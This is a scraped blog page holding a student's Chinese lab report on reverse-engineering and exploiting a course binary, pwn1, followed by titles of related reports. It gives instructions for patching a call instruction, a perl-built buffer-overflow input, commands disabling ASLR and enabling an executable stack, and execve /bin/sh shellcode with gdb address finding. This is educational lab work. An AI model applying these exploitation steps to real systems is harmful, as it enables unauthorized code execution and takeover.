2. 程式人生 > >20155231 邵煜楠《網絡對抗技術》實驗一 PC平臺逆向破解

20155231 邵煜楠《網絡對抗技術》實驗一 PC平臺逆向破解

阿新 發佈:2018-03-19
ace exe 進入 pro cnblogs 通過 構造 網絡 more

20155231 邵煜楠《網絡對抗技術》實驗一 PC平臺逆向破解

實驗內容

  1. 直接修改程序機器指令,改變程序執行流程;
  2. 通過構造輸入參數,造成BOF攻擊,改變程序執行流;
  3. 註入Shellcode並執行。

實驗步驟

一:

  • 下載目標文件pwn1,反匯編
    利用

    objdump -d pwn1

    對pwn1進行反匯編;

  • vi pwn1打開pwn1;

  • 利用%!xxd將文件轉換成16進制顯示,利用/e8 d7ff ffff進行搜索將d7改為c3(計算“0804847d(getshell)-08048491(foo)+d7”得c3ffffff),利用%!xxd -r轉回之前,再次進行反匯編;
    技術分享圖片

技術分享圖片

二:

  • 編輯輸入為

    perl -e ‘print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"‘ > input

    ,可用xxd input查看input,隨後運行pwn1;

技術分享圖片

技術分享圖片

三:
  • 輸入下面的指令
execstack -s pwn1    //設置堆棧可執行
execstack -q pwn1    //查詢文件的堆棧是否可執行
more /proc/sys/kernel/randomize_va_space 
echo "0" > /proc/sys/kernel/randomize_va_space //關閉地址隨機化
more /proc/sys/kernel/randomize_va_space
  • 構造輸入
perl -e ‘print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"‘ > input_shellcode
  • 輸入(cat input_shellcode;cat) | ./pwn1,運行pwn1,然後打開頂一個終端,輸入ps -ef | grep pwn1找到pwn1的進程號
  • 輸入gdb,進入gdb調試,輸入進程號
  • 然後輸入info r,查看棧的地址
  • 使用x/16x 0xffffd33c
    查看其存放內容
  • 由我們構造的input_shellcode可知,shellcode就在其後,修改為這個地址;
  • 輸入
  • perl -e ‘print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x10\xd3\xff\xff\x00"‘ > input_shellcode
    重新構造input

技術分享圖片
技術分享圖片

20155231 邵煜楠《網絡對抗技術》實驗一 PC平臺逆向破解

相關推薦

2017-2018-2 20155314《對抗技術》Exp1 PC平臺逆向破解(5)M

情況 ron 包括 store get 字符串 對象 輸出重定向 方法 EX1 PC平臺逆向破解1 20154309劉彥清 一、實踐說明 ****1.實踐目標 ·對象:pwn1(linux可執行文件) ·目標:是程序執行另一個代碼片段 getshell ·內容: 人工修改可

20155231 對抗技術實驗 PC平臺逆向破解

ace exe 進入 pro cnblogs 通過 構造 網絡 more 20155231 邵煜楠《網絡對抗技術》實驗一 PC平臺逆向破解 實驗內容 直接修改程序機器指令,改變程序執行流程; 通過構造輸入參數,造成BOF攻擊,改變程序執行流; 註入Shellcode並執行

對抗技術——作業

顯示 cnblogs add 資源 pan 分享 定向 當前 ipconfig 姓名:馮成龍學號: 201421430028指導教師:高見 實驗日期:2017年9月10日 1、 虛擬機安裝與調試 · 安裝windows和linux(ka

對抗技術實驗報告

搜索 net log 教師 犯罪嫌疑人 搜索引擎 目標 局域網 圖形 學 號:201421410031 中國人民公安大學 Chinese people’ public security university 網絡對抗技術 實驗報告 實驗一 網絡偵

2017-2018-2 20155231對抗技術實驗二:後門原理與實踐

虛擬機ip src oca ali 執行 -m 定時 port art 2017-2018-2 20155231《網絡對抗技術》實驗二:後門原理與實踐 常用後門工具 一、Windows獲得Linux的Shell 在本機cmd中使用ipconfig獲得windows的IP地址

2017-2018-2 20155231對抗技術實驗八: WEB基礎實驗

常用 電腦 。。 upgrade OS 實戰 進行 更新 ID 實踐目標 掌握信息搜集的最基礎技能與常用工具的使用方法。 實驗內容 (1)各種搜索技巧的應用 比如IP2Location 地理位置查詢 查詢了自己 IP路由偵查 工具:traceroute tracero

2017-2018-2 20155231對抗技術實驗五: MSF基礎應用

進行 rar oca aso 哪些 但是 前綴 關閉 搜索 2017-2018-2 20155231《網絡對抗技術》實驗五: MSF基礎應用 實踐目標 掌握信息搜集的最基礎技能與常用工具的使用方法。 實驗內容 (1)各種搜索技巧的應用 比如IP2Location 地理位置

20145311 王亦徐 《對抗技術》 Web基礎

關閉 ati 填充 加載數據 服務 www java、 例子 int 20145311 王亦徐 《網絡對抗技術》 Web基礎 實驗內容 簡單的web前端頁面(HTML、CSS等) 簡單的web後臺數據處理(PHP) Mysql數據庫 一個簡單的web登陸頁面例子 SQL

20145311王亦徐 《對抗技術》 Web安全基礎實踐

檢測 mage bottom 字符串 backdoor 隱私 port pda 寫入 2014531王亦徐 《網絡對抗技術》 Web安全基礎實踐 實驗內容 利用WebGoat平臺嘗試了一些XSS、CSRF、SQL註入攻擊 基礎問題回答 1、SQL註入攻擊原理,如何防禦

20145309李昊《對抗技術實驗9 web安全基礎實踐

ons ava transfer mysql 要求 占用 nsf 工具 1.0 本實驗在同學幫助下完成 一、實驗準備 1.0 實驗目標和內容 Web前端HTML。能正常安裝、啟停Apache。理解HTML,理解表單,理解GET與POST方法,編寫一個含有表單的HTML。

對抗技術 2017-2018-2 20152515 Exp1 PC平臺逆向破解(5)M

動態 補碼 ali guid dump cal mark 函數 方案 PC平臺逆向破解 實踐內容1 直接修改程序機器指令,改變程序執行流程 知識要求:Call指令,EIP寄存器,指令跳轉的偏移計算,補碼,反匯編指令objdump,十六進制編輯工具 學習目標:理解可執行文

2017-2018-2 20155315《對抗技術》Exp1:PC平臺逆向破解

損壞 href 補碼 定位 log class ali 相差 運行程序 實驗目的 本次實踐的對象是一個名為pwn1的linux可執行文件。 該程序正常執行流程是:main調用foo函數,foo函數會簡單回顯任何用戶輸入的字符串。 該程序同時包含另一個代碼片段,getShe

對抗技術 2017-2018-2 20152515 Exp2 後門原理與實踐

技術分享 cnblogs 利用 mage 可選 任務計劃 攝像頭 寫入 提權 1.實驗內容 (1)使用netcat獲取主機操作Shell,cron啟動 (0.5分) (2)使用socat獲取主機操作Shell, 任務計劃啟動 (0.5分) (3)使用MSF meterp

20154307 《對抗技術實驗二 後門原理與實踐

文件的 img 選擇 msfvenom 任務計劃 err clas 關閉 ali 20154307 《網絡對抗技術》實驗二 後門原理與實踐 一、基礎問題回答 (1)例舉你能想到的一個後門進入到你系統中的可能方式? 答:下載盜版軟件或者盜版電影的時候。 (2)例舉你知道的後門

2017-2018-4 20155317《對抗技術》EXP3 免殺原理與實踐

運行 log jar idt 連通 進行 all 結果 暫時 2017-2018-4 20155317《網絡對抗技術》EXP3 免殺原理與實踐 一、問題回答 (1)殺軟是如何檢測出惡意代碼的? (2)免殺是做什麽? (3)免殺的基本方法有哪些? 2.實踐 (1) 正確

2017-2018-2 20155230《對抗技術實驗3:免殺原理與實踐

語言 code 編碼 病毒 div 就是 加密 網絡 殺毒軟件 基礎問題回答 1、殺軟是如何檢測出惡意代碼的? 殺軟檢測惡意代碼主要有三種方式: ①特征碼的檢測:殺毒軟件的病毒庫記錄了一些惡意軟件的特征碼,這些特征碼由一個不大於64字節的字符串組成,且是只有該病毒內

20155218 《對抗技術》 MAL_惡意代碼分析

內容 ins com 技術 shell 一些記錄 地址 行修改 問題 20155218 《網絡對抗技術》 MAL_惡意代碼分析 實驗內容: 1、使用schtasks指令監控系統運行 1、在C盤下新建一個文本文檔,輸入一下內容後,更名為netstatlog.bat date

2017-2018-2 《對抗技術》 20155322 Exp4 惡意代碼分析

msfvenom 密鑰對 想要 ipv 執行 接收 .net 數據 ref [-= 博客目錄 =-] 1-實踐目標 1.1-實踐介紹 1.2-實踐內容 1.3-實踐要求 2-實踐過程 2.1-Mac下網絡監控 2.2-Windows下網絡監控 2.3-Mac下惡意

2017-2018-2 20155315《對抗技術》Exp5 :MSF基礎應用

spl table inter lob master type AR .cn 捕獲 實驗目的 學會用metasploit進行簡單的攻擊操作 教程 實驗內容 metasploit中有六個模塊分別是 滲透攻擊模塊(Exploit Modules) 輔助模塊(Auxiliary

20155229《對抗技術》Exp5:MSF基礎應用

targe ret 研究 完成 系統類型 show ref coo AR 實驗內容 本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成: 一個主動攻擊實踐,如ms08-067; 一個針對瀏覽器的攻擊,如ms11-050; 一個針